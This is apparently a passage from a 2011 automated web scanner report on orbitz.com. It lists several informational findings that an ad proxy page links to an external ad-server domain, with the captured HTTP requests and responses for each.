Path:	/shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/shared/adserverProxy.jsp?tab=1

The response contains the following links to other domains:

http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_PackageSave-30-Sheraton_519x225.jpg
http://www.revresda.com/event.ng/Type=click&FlightID=84082&AdID=228434&TargetID=37186&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,7949,8303,8773,11672,12591,14861,22067,24028,30359,34504,34960,35825,36139,38844,39489,39804,42624,44168,45767,47055,47283,47463,48051,48208,49324,49979,50391,50409,50807,50828,51699&Targets=37627,37186,53973,41261,52137&Values=34,46,63,82,90,100,194,216,264,32876,33112,33119,33156,33234,34137,34172,34581,34635,34641,34959,34960,35048,35272,35582,35643,35657,35682,35771,35793,36063,36105,36112,36138,66787,66797,67440,68027,68088,68179,68180,68236,68270,68271,68318,68322,68325,68326,68359,68363,68367,68375,102874,102875,103013,103016&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http:/www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=cs_qs

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 1049
Date: Tue, 01 Feb 2011 15:22:31 GMT
Cache-Control: private
Content-Length: 1049

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=84082&AdID=228434&TargetID=37186&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,7949,8303,8773,11672,12591,14861,22067,24028,30359,34504,34960,35825,36139,38844,39489,39804,42624,44168,45767,47055,47283,47463,48051,48208,49324,49979,50391,50409,50807,50828,51699&Targets=37627,37186,53973,41261,52137&Values=34,46,63,82,90,100,194,216,264,32876,33112,33119,33156,33234,34137,34172,34581,34635,34641,34959,34960,35048,35272,35582,35643,35657,35682,35771,35793,36063,36105,36112,36138,66787,66797,67440,68027,68088,68179,68180,68236,68270,68271,68318,68322,68325,68326,68359,68363,68367,68375,102874,102875,103013,103016&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dpromotions%26cnt%3DPRO%26type%3Dcs_qs"><img src="http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_PackageSave-30-Sheraton_519x225.jpg" border=0 height=225 width=519 alt="Click Here"></a>
...[SNIP]...

17.368. http://www.orbitz.com/shared/adserverProxy.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/shared/adserverProxy.jsp?tab=2

The response contains the following links to other domains:

http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_Allinclusive1_20090915.jpg
http://www.revresda.com/event.ng/Type=click&FlightID=81438&AdID=218861&TargetID=37184&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14862,22067,24028,30359,34504,34960,35825,36139,38844,39489,39804,42624,44168,45767,47055,47283,47463,48051,48208,49324,49979,50391,50409,50807,50828,51699&Targets=37627,37184,53973,41261,52137&Values=34,46,63,83,90,100,194,216,264,32876,33112,33119,33156,33234,34137,34172,34581,34635,34641,34960,35048,35583,35643,35657,35682,35771,35793,36063,36105,36112,36138,66788,66797,67440,68088,68179,68180,68236,68270,68271,68318,68322,68325,68326,68359,68363,68366,68375,102874,102875,103013,103016&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http:/www.orbitz.com/App/PerformMDLPDealsContent?deal_id=allinclusive&cnt=PKH&type=cs_qs

Request

GET /shared/adserverProxy.jsp?tab=2 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=8A6FFB92DC8FD8DB087ABE1679967FE5; Path=/
Content-Type: text/html
Cteonnt-Length: 1019
Date: Wed, 02 Feb 2011 16:05:40 GMT
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 1019

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=81438&AdID=218861&TargetID=37184&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14862,22067,24028,30359,34504,34960,35825,36139,38844,39489,39804,42624,44168,45767,47055,47283,47463,48051,48208,49324,49979,50391,50409,50807,50828,51699&Targets=37627,37184,53973,41261,52137&Values=34,46,63,83,90,100,194,216,264,32876,33112,33119,33156,33234,34137,34172,34581,34635,34641,34960,35048,35583,35643,35657,35682,35771,35793,36063,36105,36112,36138,66788,66797,67440,68088,68179,68180,68236,68270,68271,68318,68322,68325,68326,68359,68363,68366,68375,102874,102875,103013,103016&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dallinclusive%26cnt%3DPKH%26type%3Dcs_qs"><img src="http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_Allinclusive1_20090915.jpg" border=0 height=225 width=519 alt="Click Here"></a>
...[SNIP]...

17.369. http://www.orbitz.com/shared/adserverProxy.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/shared/adserverProxy.jsp?tab=3

The response contains the following links to other domains:

http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/crs/ORB_Q1sale_0118-0214_519x225.jpg
http://www.revresda.com/event.ng/Type=click&FlightID=115231&AdID=230360&TargetID=37183&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,7949,8303,8773,11672,12591,14863,22067,24028,30359,34504,34960,35825,36139,38844,39489,39804,42624,44168,45767,47055,47283,47463,48051,48208,49324,49979,50391,50409,50807,50828,51699&Targets=37627,37183,53973,41261,52137&Values=34,46,63,82,90,100,194,216,264,32520,32876,33112,33119,33156,33234,34137,34172,34581,34635,34641,34959,34960,35048,35272,35582,35643,35657,35682,35771,35793,36063,36105,36112,36138,66789,66797,67440,67898,67941,67944,68027,68088,68179,68180,68236,68270,68271,68318,68322,68325,68326,68359,68363,68367,68375,102874,102875,103013,103016&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http:/cruises.orbitz.com/promotion/orbitz/cru_event/default.asp

Request

GET /shared/adserverProxy.jsp?tab=3 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573798141:ss=1296573790782

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 1033
Date: Tue, 01 Feb 2011 15:22:41 GMT
Cache-Control: private
Content-Length: 1033

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=115231&AdID=230360&TargetID=37183&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,7949,8303,8773,11672,12591,14863,22067,24028,30359,34504,34960,35825,36139,38844,39489,39804,42624,44168,45767,47055,47283,47463,48051,48208,49324,49979,50391,50409,50807,50828,51699&Targets=37627,37183,53973,41261,52137&Values=34,46,63,82,90,100,194,216,264,32520,32876,33112,33119,33156,33234,34137,34172,34581,34635,34641,34959,34960,35048,35272,35582,35643,35657,35682,35771,35793,36063,36105,36112,36138,66789,66797,67440,67898,67941,67944,68027,68088,68179,68180,68236,68270,68271,68318,68322,68325,68326,68359,68363,68367,68375,102874,102875,103013,103016&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fcruises.orbitz.com%2Fpromotion%2Forbitz%2Fcru_event%2Fdefault.asp"><img src="http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/crs/ORB_Q1sale_0118-0214_519x225.jpg" border=0 height=225 width=519 alt="Click Here"></a>
...[SNIP]...

17.370. http://www.orbitz.com/shared/adserverProxy.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/shared/adserverProxy.jsp?tab=5

The response contains the following link to another domain:

http://www.revresda.com/event.ng/Type=click&FlightID=81442&AdID=228666&TargetID=37188&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,7949,8303,8773,11672,12591,14865,22067,24028,30359,34504,34960,35825,36139,38844,39489,39804,42624,44168,45767,47055,47283,47463,48051,48208,49324,49979,50391,50409,50807,50828,51699&Targets=37627,37188,53973,41261,52137&Values=34,46,63,82,90,100,194,216,264,32520,32876,33112,33119,33156,33234,34137,34172,34581,34635,34641,34959,34960,35048,35272,35582,35643,35657,35682,35771,35793,36063,36105,36112,36138,66791,66797,67440,67898,67941,67944,68027,68088,68179,68180,68236,68270,68271,68318,68322,68325,68326,68359,68363,68367,68375,102874,102875,103013,103016&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http:/www.orbitz.com/App/PerformMDLPDealsContent?deal_id=sanfrancisco-vacations&cnt=PKH&type=cs_qs

Request

GET /shared/adserverProxy.jsp?tab=5 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573798141:ss=1296573790782

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 1076
Date: Tue, 01 Feb 2011 15:22:45 GMT
Cache-Control: private
Content-Length: 1076

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=81442&AdID=228666&TargetID=37188&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,7949,8303,8773,11672,12591,14865,22067,24028,30359,34504,34960,35825,36139,38844,39489,39804,42624,44168,45767,47055,47283,47463,48051,48208,49324,49979,50391,50409,50807,50828,51699&Targets=37627,37188,53973,41261,52137&Values=34,46,63,82,90,100,194,216,264,32520,32876,33112,33119,33156,33234,34137,34172,34581,34635,34641,34959,34960,35048,35272,35582,35643,35657,35682,35771,35793,36063,36105,36112,36138,66791,66797,67440,67898,67941,67944,68027,68088,68179,68180,68236,68270,68271,68318,68322,68325,68326,68359,68363,68367,68375,102874,102875,103013,103016&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dsanfrancisco-vacations%26cnt%3DPKH%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_SanFrancisco-250_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...

17.371. http://www.orbitz.com/shared/adserverProxy.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/shared/adserverProxy.jsp?tab=2

The response contains the following links to other domains:

http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_Ski40-CO2_519x225.jpg
http://www.revresda.com/event.ng/Type=click&FlightID=81438&AdID=218484&TargetID=37184&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,7949,8303,8773,11672,12591,14862,22067,24028,30359,34504,34960,35825,36139,38844,39489,39804,42624,44168,45767,47055,47283,47463,48051,48208,49324,49979,50391,50409,50807,50828,51699&Targets=37627,37184,53973,41261,52137&Values=34,46,63,82,90,100,194,216,264,32876,33112,33119,33156,33234,34137,34172,34581,34635,34641,34959,34960,35048,35272,35582,35643,35657,35682,35771,35793,36063,36105,36112,36138,66788,66797,67440,68027,68088,68179,68180,68236,68270,68271,68318,68322,68325,68326,68359,68363,68367,68375,102874,102875,103013,103016&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http:/www.orbitz.com/App/PerformMDLPDealsContent?deal_id=ski&cnt=PRO&type=cs_qs

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 1028
Date: Tue, 01 Feb 2011 15:22:33 GMT
Cache-Control: private
Content-Length: 1028

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=81438&AdID=218484&TargetID=37184&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,7949,8303,8773,11672,12591,14862,22067,24028,30359,34504,34960,35825,36139,38844,39489,39804,42624,44168,45767,47055,47283,47463,48051,48208,49324,49979,50391,50409,50807,50828,51699&Targets=37627,37184,53973,41261,52137&Values=34,46,63,82,90,100,194,216,264,32876,33112,33119,33156,33234,34137,34172,34581,34635,34641,34959,34960,35048,35272,35582,35643,35657,35682,35771,35793,36063,36105,36112,36138,66788,66797,67440,68027,68088,68179,68180,68236,68270,68271,68318,68322,68325,68326,68359,68363,68367,68375,102874,102875,103013,103016&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dski%26cnt%3DPRO%26type%3Dcs_qs"><img src="http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_Ski40-CO2_519x225.jpg" border=0 height=225 width=519 alt="Click Here"></a>
...[SNIP]...

17.372. http://www.orbitz.com/shared/adserverProxy.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/shared/adserverProxy.jsp?tab=4

The response contains the following links to other domains:

http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_MGMResorts-Show_519x225.jpg
http://www.revresda.com/event.ng/Type=click&FlightID=81441&AdID=226067&TargetID=37187&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14864,22067,24028,30359,34504,34960,35825,36139,38844,39489,39804,42624,44168,45767,47055,47283,47463,48051,48208,49324,49979,50391,50409,50807,50828,51699&Targets=37627,37187,53973,41261,52137&Values=34,46,63,83,90,100,194,216,264,32876,33112,33119,33156,33234,34137,34172,34581,34635,34641,34960,35048,35583,35643,35657,35682,35771,35793,36063,36105,36112,36138,66790,66797,67440,68088,68179,68180,68236,68270,68271,68318,68322,68325,68326,68359,68363,68366,68375,102874,102875,103013,103016&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http:/www.orbitz.com/App/PerformMDLPDealsContent?deal_id=mgm&cnt=PRO&type=cs_qs

Request

GET /shared/adserverProxy.jsp?tab=4 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573798141:ss=1296573790782

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=E25EDCB558548273D93B605C412A2AF8; Path=/
Content-Type: text/html
Cteonnt-Length: 1011
Date: Wed, 02 Feb 2011 16:05:40 GMT
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 1011

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=81441&AdID=226067&TargetID=37187&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14864,22067,24028,30359,34504,34960,35825,36139,38844,39489,39804,42624,44168,45767,47055,47283,47463,48051,48208,49324,49979,50391,50409,50807,50828,51699&Targets=37627,37187,53973,41261,52137&Values=34,46,63,83,90,100,194,216,264,32876,33112,33119,33156,33234,34137,34172,34581,34635,34641,34960,35048,35583,35643,35657,35682,35771,35793,36063,36105,36112,36138,66790,66797,67440,68088,68179,68180,68236,68270,68271,68318,68322,68325,68326,68359,68363,68366,68375,102874,102875,103013,103016&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dmgm%26cnt%3DPRO%26type%3Dcs_qs"><img src="http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_MGMResorts-Show_519x225.jpg" border=0 height=225 width=519 alt="Click Here"></a>
...[SNIP]...

17.373. http://www.orbitz.com/shared/adserverProxy.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/shared/adserverProxy.jsp?tab=1

The response contains the following links to other domains:

http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_PackageSave-30-Sheraton_519x225.jpg
http://www.revresda.com/event.ng/Type=click&FlightID=84082&AdID=228434&TargetID=37186&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,7949,8303,8773,11672,12591,14861,22067,24028,30359,34504,34960,35825,36139,38844,39489,39804,42624,44168,45767,47055,47283,47463,48051,48208,49324,49979,50391,50409,50807,50828,51699&Targets=37627,37186,53973,41261,52137&Values=34,46,63,82,90,100,194,216,264,32520,32876,33112,33119,33156,33234,34137,34172,34581,34635,34641,34959,34960,35048,35272,35582,35643,35657,35682,35771,35793,36063,36105,36112,36138,66787,66797,67440,67898,67941,67944,68027,68088,68179,68180,68236,68270,68271,68318,68322,68325,68326,68359,68363,68367,68375,102874,102875,103013,103016&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http:/www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=cs_qs

Request

GET /shared/adserverProxy.jsp?tab=1 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573798141:ss=1296573790782; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 1073
Date: Tue, 01 Feb 2011 15:22:49 GMT
Cache-Control: private
Content-Length: 1073

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=84082&AdID=228434&TargetID=37186&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,7949,8303,8773,11672,12591,14861,22067,24028,30359,34504,34960,35825,36139,38844,39489,39804,42624,44168,45767,47055,47283,47463,48051,48208,49324,49979,50391,50409,50807,50828,51699&Targets=37627,37186,53973,41261,52137&Values=34,46,63,82,90,100,194,216,264,32520,32876,33112,33119,33156,33234,34137,34172,34581,34635,34641,34959,34960,35048,35272,35582,35643,35657,35682,35771,35793,36063,36105,36112,36138,66787,66797,67440,67898,67941,67944,68027,68088,68179,68180,68236,68270,68271,68318,68322,68325,68326,68359,68363,68367,68375,102874,102875,103013,103016&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dpromotions%26cnt%3DPRO%26type%3Dcs_qs"><img src="http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_PackageSave-30-Sheraton_519x225.jpg" border=0 height=225 width=519 alt="Click Here"></a>
...[SNIP]...

17.374. http://www.orbitz.com/shared/adserverProxy.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/shared/adserverProxy.jsp?tab=4

The response contains the following links to other domains:

http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_Romance50_519x225.jpg
http://www.revresda.com/event.ng/Type=click&FlightID=81441&AdID=227377&TargetID=37187&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,7949,8303,8773,11672,12591,14864,22067,24028,30359,34504,34960,35825,36139,38844,39489,39804,42624,44168,45767,47055,47283,47463,48051,48208,49324,49979,50391,50409,50807,50828,51699&Targets=37627,37187,53973,41261,52137&Values=34,46,63,82,90,100,194,216,264,32520,32876,33112,33119,33156,33234,34137,34172,34581,34635,34641,34959,34960,35048,35272,35582,35643,35657,35682,35771,35793,36063,36105,36112,36138,66790,66797,67440,67898,67941,67944,68027,68088,68179,68180,68236,68270,68271,68318,68322,68325,68326,68359,68363,68367,68375,102874,102875,103013,103016&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http:/www.orbitz.com/App/PerformMDLPDealsContent?deal_id=romance&cnt=PRO&type=cs_qs

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 1056
Date: Tue, 01 Feb 2011 15:22:41 GMT
Cache-Control: private
Content-Length: 1056

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=81441&AdID=227377&TargetID=37187&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,7949,8303,8773,11672,12591,14864,22067,24028,30359,34504,34960,35825,36139,38844,39489,39804,42624,44168,45767,47055,47283,47463,48051,48208,49324,49979,50391,50409,50807,50828,51699&Targets=37627,37187,53973,41261,52137&Values=34,46,63,82,90,100,194,216,264,32520,32876,33112,33119,33156,33234,34137,34172,34581,34635,34641,34959,34960,35048,35272,35582,35643,35657,35682,35771,35793,36063,36105,36112,36138,66790,66797,67440,67898,67941,67944,68027,68088,68179,68180,68236,68270,68271,68318,68322,68325,68326,68359,68363,68367,68375,102874,102875,103013,103016&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dromance%26cnt%3DPRO%26type%3Dcs_qs"><img src="http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_Romance50_519x225.jpg" border=0 height=225 width=519 alt="Click Here"></a>
...[SNIP]...

17.375. http://www.orbitz.com/shared/adserverProxy.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/shared/adserverProxy.jsp?tab=1

The response contains the following links to other domains:

http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_PackageSave-30-Sheraton_519x225.jpg
